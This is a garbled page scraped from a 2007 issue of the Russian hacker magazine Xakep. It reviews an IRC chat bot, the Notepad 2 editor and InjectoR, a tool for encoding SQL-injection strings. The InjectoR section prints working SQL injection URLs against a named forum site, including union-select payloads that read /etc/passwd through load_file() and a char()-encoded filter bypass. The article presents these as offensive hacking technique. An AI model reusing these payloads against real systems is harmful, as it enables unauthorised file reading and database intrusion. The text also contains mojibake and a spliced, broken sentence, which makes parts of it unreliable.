Ãœðù - Xakep Online
Ãœðù - Xakep Online
Ãœðù - Xakep Online
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
взлом<br />
• !банлист+[e-mail]* — внесение непонравившегося<br />
мыла в банлист — blacklist.rbt.<br />
• !хуиз [IP-адрес] * — получение данных<br />
об IP-адресе через хуиз-сервис whois.ripe.net.<br />
• !пой [название файла] * — построчное<br />
цитирование указанного файла с задержкой<br />
между строчками в три секунды. Для этого<br />
цитируемый файл должен быть сохранен в<br />
папке основного скрипта с названием название_файла.rbt<br />
(файлы конь.rbt, елка.rbt).<br />
• !кик [ник] * — выброс пользователя с указанным<br />
ником из чата (душевная команда =)).<br />
• !комендантч+ * — этой командой включается<br />
режим «комендантский час», при котором<br />
бот выгоняет всех вновь вошедших чатлан.<br />
Она бывает полезна для проведения приватных<br />
бесед и при атаках флудеров.<br />
• !диалог+ * — включаем бота в активную<br />
беседу, бот будет отвечать на адресованные<br />
ему высказывания (файл bred.rbt).<br />
• !свали * — выкидываем бота из чата.<br />
Это далеко не полный перечень команд, поэтому<br />
можешь смело экспериментировать. Кстати,<br />
тебе повезло — на диск я выложил именно<br />
приватную версию бота, а не ту, что доступна<br />
для всех желающих на сайте команды (за<br />
появление бота на свет благодарим хакера<br />
под ником SMERSH). В общем, приятного<br />
тебе отдыха и веселого глумления над<br />
народом :).<br />
Программа: Notepad 2<br />
ОС: Windows 98/ME/2000/XP<br />
Автор: Florian Balmer<br />
Главная тулза хакера<br />
Взглянув в графу названия программы, ты,<br />
наверное, удивился (или подумал, что в твоем<br />
любимом журнале курят не ту траву =)). Спешу<br />
объясниться. Утила, которую я тебе сейчас<br />
представлю, действительно носит гордое<br />
название Notepad 2 :). Дело в том, что меня уже<br />
порядком достали тулзы для подсветки синтаксиса<br />
различных языков программирования.<br />
Под Linux такой проблемы нет, поскольку под<br />
рукой всегда есть vim и kwrite, а вот под Виндой<br />
я перебрал с десяток подобных прог. Однако<br />
ни одна из них не смогла удовлетворить моих<br />
вполне скромных потребностей. К счастью, в<br />
один прекрасный момент на глаза мне попался<br />
очередной заменитель блокнота — Notepad 2.<br />
Поюзав тулзу несколько дней, я навсегда<br />
уготовил ей место на своем винте =). Перечислю<br />
основные характеристики софтинки:<br />
• настраиваемая подсветка синтаксиса:<br />
HTML, JavaScript, VBScript, ASP, PHP, CSS,<br />
Perl/CGI;<br />
C/C++, C#, Java, VB, Pascal, Assembler, SQL;<br />
INI, REG, INF, BAT, DIFF;<br />
• редактирование текста перетаскиванием;<br />
• простые регулярные выражения поиска и<br />
замены;<br />
• команды редактирования слова, строки и<br />
блока;<br />
• подсветка скобок, автоотступ, указатель<br />
длинных строк, увеличение;<br />
• поддержка текстовых файлов Unicode, UTF-<br />
8, Unix и Mac;<br />
• вставка времени/даты (краткая/полная<br />
форма) (, );<br />
• вставка имени файла/пути (,<br />
).<br />
Кроме того, доработанный блокнотик имеет<br />
огромное количество горячих клавиш, вот<br />
лишь самые полезные из них:<br />
— указать схему подсветки синтаксиса;<br />
— настроить схему подсветки<br />
синтаксиса;<br />
— показать нумерацию строк;<br />
— переход на указанную строку;<br />
— найти соответствующую скобку;<br />
— выделить до скобки.<br />
Нет смысла продолжать описывать все, на что способен<br />
Notepad 2. Главная черта программ такого<br />
рода — это удобство. Поэтому смело сливай с нашего<br />
DVD апдейтнутый блокнот — не пожалеешь.<br />
Программа: InjectoR<br />
ОС: Windows 98/ME/2000/XP<br />
Автор: SMERSH<br />
Injector — просто и со вкусом :)<br />
тьи о проге Antichat SQL-tools, я не спроста затронул<br />
эту тему. Не спорю, утила полезная и классная,<br />
но не об этом речь. Если ты внимательно читал мои<br />
предыдущие статьи, то заметил, что при взломе<br />
БД, реализуя очередной мудреный инъект, то и<br />
дело приходится юзать функции char(), concat(),<br />
и т.д. И все бы хорошо, но вбивать вручную такие<br />
строки — занятие для редкого мазохиста =).<br />
Вот прикинь, имеем мы на руках такую багу:<br />
http://script.tourdebali.com/<br />
asnforum/viewtopic.php?id=-11+un<br />
ion+select+1,2,3,4,5,6,7+/*<br />
Первым делом, подобрав количество полей,<br />
проверяем наличие прав file_priv:<br />
http://script.tourdebali.<br />
com/asnforum/viewtopic.php?id=-<br />
11+union+select+1,2,3,4,5,load_<br />
file('/etc/passwd')),7+/*<br />
И тут скрипт выдает ошибку, не суля ничего,<br />
кроме облома :(. Что делать? Правильно, попробовать<br />
обойти фильтрацию при помощи char():<br />
http://script.tourdebali.com/<br />
asnforum/viewtopic.php?id=-11+un<br />
ion+select+1,2,3,4,5,load_file(c<br />
har(47,101,116,99,47,112,97,115,<br />
115,119,100)),7+/*<br />
В результате получаем доступ к чтению файлов на<br />
сервере =). К чему я это говорю? Да к тому, что переводить<br />
вручную строку «/etc/passwd» в «47,101,116,99,4<br />
7,112,97,115,115,119,100» — занятие не из приятных.<br />
А теперь представь, какое «удовольствие» ты получишь,<br />
переводя ручками путь до конфига «/home/<br />
tdb/public_html/script/asnforum/config.php» =).<br />
Я уже молчу про случаи, когда выводится содержимое<br />
только одного поля и нужно юзать concat().<br />
Геморроя хватает везде, а в нашем деле — тем<br />
более :). В одном из прошлых номеров журнала я<br />
выкладывал свой перловый скрипт, возможностью<br />
которого была, в частности, работа с ASCII. Но<br />
недавно, мне подвернулась гораздо более удобная<br />
тулза, имя которой InjectoR. Распинаться сильно не<br />
буду, коротко обозначу основные моменты:<br />
• работа с char(), concat(), not in();<br />
• презентабельный интерфейс :);<br />
• удобно висит в трее =).<br />
Честно говоря, софтинка до боли простая, но<br />
ее реализация заслуживает респекта. Гуевый<br />
интерфейс выполнен на пять с плюсом, да и в<br />
трее тулза смотрится прекрасно. Удобно, когда<br />
под рукой всегда есть нужный тебе инструмент,<br />
который, ко всему прочему, еще и радует глаз. z<br />
Возвращаемся к наболевшему, а именно к автоматизации<br />
взлома. Рассказывая в первой части стаxàêåð<br />
05 /101/ 07<br />
/<br />
095